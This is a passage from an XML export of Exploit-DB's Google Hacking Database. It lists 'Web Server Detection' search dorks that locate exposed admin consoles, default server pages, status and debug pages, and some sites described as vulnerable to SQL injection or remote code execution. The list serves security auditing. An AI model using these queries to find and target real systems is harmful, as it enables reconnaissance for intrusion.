<date>2021-09-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7068</id>
<link>https://www.exploit-db.com/ghdb/7068</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;web server login&quot; intext:&quot;site ip&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;web server login&quot; intext:&quot;site ip&quot;
# Category: Pages Containing Login Portals
# Date: 02/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;web server login&quot; intext:&quot;site ip&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;web server login&quot; intext:&quot;site ip&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5780</id>
<link>https://www.exploit-db.com/ghdb/5780</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Web Server's Default Page&quot; intext:&quot;hosting using Plesk&quot; -www</shortDescription>
<textualDescription>Web Server Detection
*Ubaid Ahmed*
*https://UbaidAhmed.com - Life is like riding a
bicycle, you dont fall off unless you plan to stop peddling*
</textualDescription>
<query>intitle:&quot;Web Server's Default Page&quot; intext:&quot;hosting using Plesk&quot; -www</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Server's Default Page&quot; intext:&quot;hosting using Plesk&quot; -www</querystring>
<edb></edb>
<date>2020-03-09</date>
<author>Ubaid Ahmed</author>
</entry>
<entry>
<id>982</id>
<link>https://www.exploit-db.com/ghdb/982</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to 602LAN SUITE *&quot;</shortDescription>
<textualDescription>The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail.</textualDescription>
<query>intitle:&quot;Welcome to 602LAN SUITE *&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Welcome+to+602LAN+SUITE+*%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5751</id>
<link>https://www.exploit-db.com/ghdb/5751</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to JBoss&quot;</shortDescription>
<textualDescription>This dork for JBoss AS entry page even if your JMX console is protected.
*intitle:&quot;Welcome to JBoss&quot; *
Punit Darji (Rapidsafeguard)
(twitter.com/Rapidsafeguard)
</textualDescription>
<query>intitle:&quot;Welcome to JBoss&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to JBoss&quot;</querystring>
<edb></edb>
<date>2020-02-24</date>
<author>PUNIT DARJI</author>
</entry>
<entry>
<id>866</id>
<link>https://www.exploit-db.com/ghdb/866</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;welcome to mono xsp&quot;</shortDescription>
<textualDescription>XSD is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix</textualDescription>
<query>intitle:&quot;welcome to mono xsp&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22welcome+to+mono+xsp%22</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5726</id>
<link>https://www.exploit-db.com/ghdb/5726</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to nginx!&quot; intext:&quot;Welcome to nginx on Debian!&quot; intext:&quot;Thank you for&quot;</shortDescription>
<textualDescription>Web Server Detection:
intitle:&quot;Welcome to nginx!&quot; intext:&quot;Welcome to nginx on Debian!&quot;
intext:&quot;Thank you for&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Welcome to nginx!&quot; intext:&quot;Welcome to nginx on Debian!&quot; intext:&quot;Thank you for&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to nginx!&quot; intext:&quot;Welcome to nginx on Debian!&quot; intext:&quot;Thank you for&quot;</querystring>
<edb></edb>
<date>2020-02-04</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7294</id>
<link>https://www.exploit-db.com/ghdb/7294</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to OpenResty!&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Welcome to OpenResty!&quot;
# Various Online Devices
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Welcome to OpenResty!&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to OpenResty!&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>952</id>
<link>https://www.exploit-db.com/ghdb/952</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to the Advanced Extranet Server, ADVX!&quot;</shortDescription>
<textualDescription>Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache.</textualDescription>
<query>intitle:&quot;Welcome to the Advanced Extranet Server, ADVX!&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Welcome%20to%20the%20Advanced%20Extranet%20Server,%20ADVX!%22</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6995</id>
<link>https://www.exploit-db.com/ghdb/6995</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to WildFly&quot; intext:&quot;Administration Console&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Welcome to WildFly&quot; intext:&quot;Administration Console&quot;
# Web Server Detection
# Date: 03/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Welcome to WildFly&quot; intext:&quot;Administration Console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to WildFly&quot; intext:&quot;Administration Console&quot;</querystring>
<edb></edb>
<date>2021-06-09</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>932</id>
<link>https://www.exploit-db.com/ghdb/932</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to Windows Small Business Server 2003&quot;</shortDescription>
<textualDescription>Another way to find Small Business Server 2003, for more results check the dork by JimmyNeutron (id=763).</textualDescription>
<query>intitle:&quot;Welcome to Windows Small Business Server 2003&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Welcome+to+Windows+Small+Business+Server+2003%22&amp;num=100</querystring>
<edb></edb>
<date>2005-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>716</id>
<link>https://www.exploit-db.com/ghdb/716</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome To Xitami&quot; -site:xitami.com</shortDescription>
<textualDescription>Default Xitami installationAdditionally every default installation of Xitami webserver has a testscript which provides a lot of information about the server.It can be run by entering the following urlhttp://server/cgialias/testcgi.exe(cgialias = is usually /cgi-bin/)</textualDescription>
<query>intitle:&quot;Welcome To Xitami&quot; -site:xitami.com</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Welcome+To+Xitami%22+-site%3Axitami.com&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>671</id>
<link>https://www.exploit-db.com/ghdb/671</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome to Your New Home Page!&quot; &quot;by the Debian release&quot;</shortDescription>
<textualDescription>This finds the default Apache page on Debian installs.</textualDescription>
<query>intitle:&quot;Welcome to Your New Home Page!&quot; &quot;by the Debian release&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Welcome+to+Your+New+Home+Page%21%22+%22by+the+Debian+release%22</querystring>
<edb></edb>
<date>2004-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>961</id>
<link>https://www.exploit-db.com/ghdb/961</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome To Your WebSTAR Home Page&quot;</shortDescription>
<textualDescription>This is the default page for the WebSTAR (Macintosh) web server (Headers say --&gt; Server: WebSTAR NetCloak).</textualDescription>
<query>intitle:&quot;Welcome To Your WebSTAR Home Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Welcome+To+Your+WebSTAR+Home+Page%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7042</id>
<link>https://www.exploit-db.com/ghdb/7042</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Welcome&quot; intext:&quot;LiteSpeed Technologies, Inc. All Rights Reserved.&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Welcome&quot; intext:&quot;LiteSpeed Technologies, Inc. All Rights Reserved.&quot;
# Web Server Detection
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Welcome&quot; intext:&quot;LiteSpeed Technologies, Inc. All Rights Reserved.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome&quot; intext:&quot;LiteSpeed Technologies, Inc. All Rights Reserved.&quot;</querystring>
<edb></edb>
<date>2021-07-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>511</id>
<link>https://www.exploit-db.com/ghdb/511</link>
<category>Web Server Detection</category>
<shortDescription>intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)</shortDescription>
<textualDescription>First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack.Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical fileshttp://www.securiteam.com/unixfocus/5SP081F80K.htm</textualDescription>
<query>intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)</query>
<querystring>https://www.google.com/search?num=100&amp;&amp;q=intitle%3AAnswerBook2+inurl%3Aab2%2F+%28inurl%3A8888+%7C+inurl%3A8889%29</querystring>
<edb></edb>
<date>2004-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4894</id>
<link>https://www.exploit-db.com/ghdb/4894</link>
<category>Web Server Detection</category>
<shortDescription>intitle:HTTP Server Test Page powered by CentOS</shortDescription>
<textualDescription>intitle:HTTP Server Test Page powered by CentOS
CentOS detected
ManhNho
</textualDescription>
<query>intitle:HTTP Server Test Page powered by CentOS</query>
<querystring>https://www.google.com/search?q=intitle:HTTP Server Test Page powered by CentOS</querystring>
<edb></edb>
<date>2018-07-19</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5008</id>
<link>https://www.exploit-db.com/ghdb/5008</link>
<category>Web Server Detection</category>
<shortDescription>intitle:livezilla &quot;Server Time&quot;</shortDescription>
<textualDescription>intitle:livezilla &quot;Server Time&quot;
Dork to locate LiveZilla consoles and version, as well as additional
information about the server such as PHP version.</textualDescription>
<query>intitle:livezilla &quot;Server Time&quot;</query>
<querystring>https://www.google.com/search?q=intitle:livezilla &quot;Server Time&quot;</querystring>
<edb></edb>
<date>2018-11-02</date>
<author>maiki</author>
</entry>
<entry>
<id>178</id>
<link>https://www.exploit-db.com/ghdb/178</link>
<category>Web Server Detection</category>
<shortDescription>intitle:Snap.Server inurl:Func=</shortDescription>
<textualDescription>This page reveals the existance of a SNAP server (Netowrk attached server or NAS devices) Depending on the configuration, these servers may be vulnerable, but regardless the existance of this server is useful for information gathering.</textualDescription>
<query>intitle:Snap.Server inurl:Func=</query>
<querystring>https://www.google.com/search?q=intitle%3ASnap.Server+inurl%3AFunc%3D</querystring>
<edb></edb>
<date>2004-04-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6570</id>
<link>https://www.exploit-db.com/ghdb/6570</link>
<category>Web Server Detection</category>
<shortDescription>intitle:Snoop Servlet</shortDescription>
<textualDescription># Dork Title: to Find Snoop Servlet
# Google Dork: intitle:Snoop Servlet
# Date: 23.09.2020
# Author: Ozer Goker
</textualDescription>
<query>intitle:Snoop Servlet</query>
<querystring>https://www.google.com/search?q=intitle:Snoop Servlet</querystring>
<edb></edb>
<date>2020-09-24</date>
<author>Ozer Goker</author>
</entry>
<entry>
<id>5065</id>
<link>https://www.exploit-db.com/ghdb/5065</link>
<category>Web Server Detection</category>
<shortDescription>intitle:Test Page for the Nginx HTTP Server on Fedora</shortDescription>
<textualDescription>Web server detected - Happy new year 2019
ManhNho
</textualDescription>
<query>intitle:Test Page for the Nginx HTTP Server on Fedora</query>
<querystring>https://www.google.com/search?q=intitle:Test Page for the Nginx HTTP Server on Fedora</querystring>
<edb></edb>
<date>2019-01-02</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7608</id>
<link>https://www.exploit-db.com/ghdb/7608</link>
<category>Web Server Detection</category>
<shortDescription>inurl *:8080/login.php</shortDescription>
<textualDescription># Google Dork: inurl *:8080/login.php
# Web Server Detection
# Date: 05/11/2021
# Exploit Author: Vivek Pancholi</textualDescription>
<query>inurl *:8080/login.php</query>
<querystring>https://www.google.com/search?q=inurl *:8080/login.php</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Vivek Pancholi</author>
</entry>
<entry>
<id>7218</id>
<link>https://www.exploit-db.com/ghdb/7218</link>
<category>Web Server Detection</category>
<shortDescription>inurl: /ftp intitle:&quot;office&quot;</shortDescription>
<textualDescription># Google Dork: inurl: /ftp intitle:&quot;office&quot;
# Web Server Detection
# Date: 11/09/2021
# Exploit Author: Lawrence March</textualDescription>
<query>inurl: /ftp intitle:&quot;office&quot;</query>
<querystring>https://www.google.com/search?client-b-d&amp;q=+inurl%3A+%2Fftp+intitle%3A%22office%22</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Lawrence March</author>
</entry>
<entry>
<id>7391</id>
<link>https://www.exploit-db.com/ghdb/7391</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;/app/kibana#&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/app/kibana#&quot;
# Web Server Detection
# Date: 21/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>inurl:&quot;/app/kibana#&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/app/kibana#&quot;</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Sandesh Ajgekar</author>
</entry>
<entry>
<id>6895</id>
<link>https://www.exploit-db.com/ghdb/6895</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;/domcfg.nsf&quot; &quot; Web Server Configuration&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/domcfg.nsf&quot; &quot; Web Server Configuration&quot;
# Various servers running Lotus Domino.
# Date: 29/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/domcfg.nsf&quot; &quot; Web Server Configuration&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/domcfg.nsf&quot; &quot; Web Server Configuration&quot;</querystring>
<edb></edb>
<date>2021-04-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6744</id>
<link>https://www.exploit-db.com/ghdb/6744</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;/phpmyadmin/user_password.php</shortDescription>
<textualDescription> Google Dork: inurl:&quot;/phpmyadmin/user_password.php
Date : 22nd December 2020
Impact : Sensitive Information
Author : Mukul Trivedi
[image: Screenshot Chrome.jpg]
</textualDescription>
<query>inurl:&quot;/phpmyadmin/user_password.php</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/phpmyadmin/user_password.php</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Mukul Trivedi</author>
</entry>
<entry>
<id>4092</id>
<link>https://www.exploit-db.com/ghdb/4092</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;/web-console/&quot; intitle:&quot;Administration Console&quot;</shortDescription>
<textualDescription>JBoss Application Server Info
-Xploit</textualDescription>
<query>inurl:&quot;/web-console/&quot; intitle:&quot;Administration Console&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/web-console/&quot; intitle:&quot;Administration Console&quot;</querystring>
<edb></edb>
<date>2015-10-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6119</id>
<link>https://www.exploit-db.com/ghdb/6119</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;:8088/cluster/apps&quot;</shortDescription>
<textualDescription>##################################################################################################################################
# Dork Title: to Find Apache Hadoop
# Google Dork: inurl:&quot;:8088/cluster/apps&quot;
# Date: 22.05.2020
# Author: Ozer Goker
##################################################################################################################################
</textualDescription>
<query>inurl:&quot;:8088/cluster/apps&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;:8088/cluster/apps&quot;</querystring>
<edb></edb>
<date>2020-05-25</date>
<author>Ozer Goker</author>
</entry>
<entry>
<id>6298</id>
<link>https://www.exploit-db.com/ghdb/6298</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;id=*&quot; &amp; intext:&quot;warning mysql_fetch_array()&quot;</shortDescription>
<textualDescription>Google Dork: inurl:&quot;id=*&quot; &amp; intext:&quot;warning mysql_fetch_array()&quot;
Description: List out all pages vulnerable to SQL Injection
Author: Krushna Lipane</textualDescription>
<query>inurl:&quot;id=*&quot; &amp; intext:&quot;warning mysql_fetch_array()&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;id=*&quot; &amp; intext:&quot;warning mysql_fetch_array()&quot;</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>krushna Lipane</author>
</entry>
<entry>
<id>4690</id>
<link>https://www.exploit-db.com/ghdb/4690</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;server-status&quot; &quot;Server Version: Apache/&quot; &quot;Server Built: &quot; &quot;Server uptime:&quot; &quot;Total accesses&quot; &quot;CPU Usage:&quot;</shortDescription>
<textualDescription>inurl:&quot;server-status&quot; &quot;Server Version: Apache/&quot; &quot;Server Built: &quot; &quot;Server uptime:&quot; &quot;Total accesses&quot; &quot;CPU Usage:&quot;
Above mentioned dork shows URL which has Apache server-status file openly accessible. Apache server status file discloses all the request which are send to server and most of the time it discloses hidden urls or parameter's call.
</textualDescription>
<query>inurl:&quot;server-status&quot; &quot;Server Version: Apache/&quot; &quot;Server Built: &quot; &quot;Server uptime:&quot; &quot;Total accesses&quot; &quot;CPU Usage:&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;server-status&quot; &quot;Server Version: Apache/&quot; &quot;Server Built: &quot; &quot;Server uptime:&quot; &quot;Total accesses&quot; &quot;CPU Usage:&quot;</querystring>
<edb></edb>
<date>2018-03-07</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>6954</id>
<link>https://www.exploit-db.com/ghdb/6954</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;web/database/selector&quot;</shortDescription>
<textualDescription># Dork: inurl:&quot;web/database/selector&quot;
# Find OpenERP database instances
--
Regards,
*Hilary Soita.*
</textualDescription>
<query>inurl:&quot;web/database/selector&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;web/database/selector&quot;</querystring>
<edb></edb>
<date>2021-05-25</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>5341</id>
<link>https://www.exploit-db.com/ghdb/5341</link>
<category>Web Server Detection</category>
<shortDescription>inurl:&quot;WebPortal?bankid&quot;</shortDescription>
<textualDescription>#Google Dork:
inurl:&quot;WebPortal?bankid“
#Description:
Sensitive Information: List of banks in ger hosted by the same hoster
#Author:
ProSec GmbH - Tim Schughart, Matthias Gilles, Christoph Hein </textualDescription>
<query>inurl:&quot;WebPortal?bankid&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;WebPortal?bankid&quot;</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>ProSec GmbH</author>
</entry>
<entry>
<id>6754</id>
<link>https://www.exploit-db.com/ghdb/6754</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/config/device/wcd</shortDescription>
<textualDescription># Google Dork: inurl:/config/device/wcd
# Date: 1/11/2020
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:/config/device/wcd</query>
<querystring>https://www.google.com/search?q=inurl:/config/device/wcd</querystring>
<edb></edb>
<date>2021-01-15</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>5481</id>
<link>https://www.exploit-db.com/ghdb/5481</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/iisstart.htm intitle:&quot;IIS7&quot;</shortDescription>
<textualDescription>Web Server Detection:
inurl:/iisstart.htm intitle:&quot;IIS7&quot;
inurl:/iisstart.htm intitle:&quot;IIS Windows Server&quot;
intitle:&quot;Microsoft Internet Information Services 8&quot;
inurl:/iisstart.htm intitle:&quot;IIS Windows&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/iisstart.htm intitle:&quot;IIS7&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/iisstart.htm intitle:&quot;IIS7&quot;</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6853</id>
<link>https://www.exploit-db.com/ghdb/6853</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/javax.faces.resource/</shortDescription>
<textualDescription># Dork: inurl:/javax.faces.resource/
# Identify Java Server Faces Primefaces installations
</textualDescription>
<query>inurl:/javax.faces.resource/</query>
<querystring>https://www.google.com/search?q=inurl:/javax.faces.resource/</querystring>
<edb></edb>
<date>2021-04-05</date>
<author>Daniel Ashton</author>
</entry>
<entry>
<id>4358</id>
<link>https://www.exploit-db.com/ghdb/4358</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/php/info.php</shortDescription>
<textualDescription># Google Dork: inurl:/php/info.php
# Date: 11/25/2016
# Exploit Author: Cameron Maerz @pwns4cash
# Version: php
# Tested on: all
I noticed a very similar dork in the database, and also have noticed a
trend in what hosting companies are suggesting to their customers. Thus:
inurl:/php/info.php
The results returned were different than the similar dork.</textualDescription>
<query>inurl:/php/info.php</query>
<querystring>https://www.google.com/search?q=inurl:/php/info.php</querystring>
<edb></edb>
<date>2016-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>5477</id>
<link>https://www.exploit-db.com/ghdb/5477</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/phpmyadmin/changelog.php -github -gitlab</shortDescription>
<textualDescription> Google Dork Description :
inurl:/phpmyadmin/changelog.php -github -gitlab
Submited: 2019-08-29
# Exploit Title: Phpmyadmin changelog file
# Date: 2019-08-29
# Vendor Homepage: N/A
# Version: any
# Exploit Author: 24Nitin
# Contact: https://www.linkedin.com/in/nitin-kumar-125684166
# Website: https://www.tftus.com/
</textualDescription>
<query>inurl:/phpmyadmin/changelog.php -github -gitlab</query>
<querystring>https://www.google.com/search?q=inurl:/phpmyadmin/changelog.php -github -gitlab</querystring>
<edb></edb>
<date>2019-08-30</date>
<author>24Nitin</author>
</entry>
<entry>
<id>6618</id>
<link>https://www.exploit-db.com/ghdb/6618</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/phpPgAdmin/browser.php</shortDescription>
<textualDescription>Google Dork: inurl:/phpPgAdmin/browser.php
Description: This Google Dork is used for detecting phpPgAdmin PostgreSQL
Servers.
Author: Sibi Mathew George
</textualDescription>
<query>inurl:/phpPgAdmin/browser.php</query>
<querystring>https://www.google.com/search?q=inurl:/phpPgAdmin/browser.php</querystring>
<edb></edb>
<date>2020-10-19</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>6904</id>
<link>https://www.exploit-db.com/ghdb/6904</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/Portal0000.htm</shortDescription>
<textualDescription>#Dork: inurl:/Portal0000.htm
</textualDescription>
<query>inurl:/Portal0000.htm</query>
<querystring>https://www.google.com/search?q=inurl:/Portal0000.htm</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>Brijesh Joshi</author>
</entry>
<entry>
<id>4492</id>
<link>https://www.exploit-db.com/ghdb/4492</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/pub/ inurl:_ri_</shortDescription>
<textualDescription>*Google dork description: *Servers using Oracle Responsys
*Google Search:* inurl:/pub/ inurl:_ri_
*Submitted by:* Alfie </textualDescription>
<query>inurl:/pub/ inurl:_ri_</query>
<querystring>https://www.google.com/search?q=inurl:/pub/ inurl:_ri_</querystring>
<edb></edb>
<date>2017-05-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>5294</id>
<link>https://www.exploit-db.com/ghdb/5294</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/server-status + &quot;Server MPM:&quot;</shortDescription>
<textualDescription>inurl:/server-status + &quot;Server MPM:&quot;
Apache server-status
ManhNho
</textualDescription>
<query>inurl:/server-status + &quot;Server MPM:&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/server-status + &quot;Server MPM:&quot;</querystring>
<edb></edb>
<date>2019-07-29</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6778</id>
<link>https://www.exploit-db.com/ghdb/6778</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/uploads/affwp-debug.log</shortDescription>
<textualDescription>inurl:/uploads/affwp-debug.log
Thank you
Ritesh Gohil
Security Researcher / System Test Engineer / Network Administrato
</textualDescription>
<query>inurl:/uploads/affwp-debug.log</query>
<querystring>https://www.google.com/search?q=inurl:/uploads/affwp-debug.log</querystring>
<edb></edb>
<date>2021-02-05</date>
<author>Ritesh Gohil</author>
</entry>
<entry>
<id>6735</id>
<link>https://www.exploit-db.com/ghdb/6735</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/xprober ext:php</shortDescription>
<textualDescription>Google Dork : inurl:/xprober ext:php
This will give all the X Prober Server info disclosed- A probe program for
PHP environment
(Sensitive Data Exposure)
Author : Pratik Khalane
Date : 19/12/2020
</textualDescription>
<query>inurl:/xprober ext:php</query>
<querystring>https://www.google.com/search?q=inurl:/xprober ext:php</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Pratik Khalane</author>
</entry>
<entry>
<id>4493</id>
<link>https://www.exploit-db.com/ghdb/4493</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/_catalogs</shortDescription>
<textualDescription>*Google dork description: *Identify sharepoint servers
*Google Search: *inurl:/_catalogs
*Submitted by:* Alfie </textualDescription>
<query>inurl:/_catalogs</query>
<querystring>https://www.google.com/search?q=inurl:/_catalogs</querystring>
<edb></edb>
<date>2017-05-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4946</id>
<link>https://www.exploit-db.com/ghdb/4946</link>
<category>Web Server Detection</category>
<shortDescription>inurl:/_hcms/</shortDescription>
<textualDescription>Google dork *description: * Get all sites using Hubspot's Content Mangement
System (CMS)
*Google Search: *inurl:/_hcms/
Submitted by: Alfie
Website: (https://the-infosec.com)
--
Regards,
Alfie.
the-infosec.com
</textualDescription>
<query>inurl:/_hcms/</query>
<querystring>https://www.google.com/search?q=inurl:/_hcms/</querystring>
<edb></edb>
<date>2018-09-12</date>
<author>Alfie</author>
</entry>
<entry>
<id>768</id>
<link>https://www.exploit-db.com/ghdb/768</link>
<category>Web Server Detection</category>
<shortDescription>inurl:2506/jana-admin</shortDescription>
<textualDescription>The JanaServer 2 is amongst other things a proxy server, that makes it possible for LAN members, everyone or a group as a part of the LAN, to access the internet via a Modem, ISDN or DSL connection. For this the program must be installed on the computer, that can access the internet by an installed modem, ISDN or a DSL adapter.</textualDescription>
<query>inurl:2506/jana-admin</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3A2506%2Fjana-admin+</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6763</id>
<link>https://www.exploit-db.com/ghdb/6763</link>
<category>Web Server Detection</category>
<shortDescription>inurl:?XDEBUG_SESSION_START=phpstorm</shortDescription>
<textualDescription>#Google Dork :
inurl:?XDEBUG_SESSION_START
#Summary:
Xdebug is a php extension that allows to debug php pages, remotely by using DGBp protocol.
- Code execution is possible through eval or property_set xdebug commands.
- Attacker is also able to read content of file using source xdebug command
#Date : 24/01/2021
#Exploit Author : Lutzenfried (Clément Cruchet)
Thanks,
Lutzenfried (Clément Cruchet)</textualDescription>
<query>inurl:?XDEBUG_SESSION_START=phpstorm</query>
<querystring>https://www.google.com/search?q=inurl:?XDEBUG_SESSION_START=phpstorm</querystring>
<edb></edb>
<date>2021-01-26</date>
<author>Lutzenfried</author>
</entry>
<entry>
<id>6849</id>
<link>https://www.exploit-db.com/ghdb/6849</link>
<category>Web Server Detection</category>
<shortDescription>inurl:CFIDE/adminapi</shortDescription>
<textualDescription># Google Dork: inurl:CFIDE/adminapi
# Date: 3/26/2020
# Exploit Author: Javier Bernardo
</textualDescription>
<query>inurl:CFIDE/adminapi</query>
<querystring>https://www.google.com/search?q=inurl:CFIDE/adminapi</querystring>
<edb></edb>
<date>2021-03-29</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4839</id>
<link>https://www.exploit-db.com/ghdb/4839</link>
<category>Web Server Detection</category>
<shortDescription>inurl:composer.json codeigniter -site:github.com</shortDescription>
<textualDescription> *This can be used to identify the code hosted by different companies that
are created with CodeIgniter PHP framework.*
*Thanks*
*Anwar Ayoob*
</textualDescription>
<query>inurl:composer.json codeigniter -site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:composer.json codeigniter -site:github.com</querystring>
<edb></edb>
<date>2018-06-04</date>
<author>Anwar Ayoob</author>
</entry>
<entry>
<id>242</id>
<link>https://www.exploit-db.com/ghdb/242</link>
<category>Web Server Detection</category>
<shortDescription>inurl:domcfg.nsf</shortDescription>
<textualDescription>This will return a listing of servers running Lotus Domino. These servers by default have very descriptive error messages which can be used to obtain path and OS information. In addition, adding &quot;Login Form Mapping&quot; to the search will allow you to see detailed information about a few of the servers that have this option enabled.</textualDescription>
<query>inurl:domcfg.nsf</query>
<querystring>https://www.google.com/search?q=DOMCFG.NSF&amp;start=0&amp;sa=N</querystring>
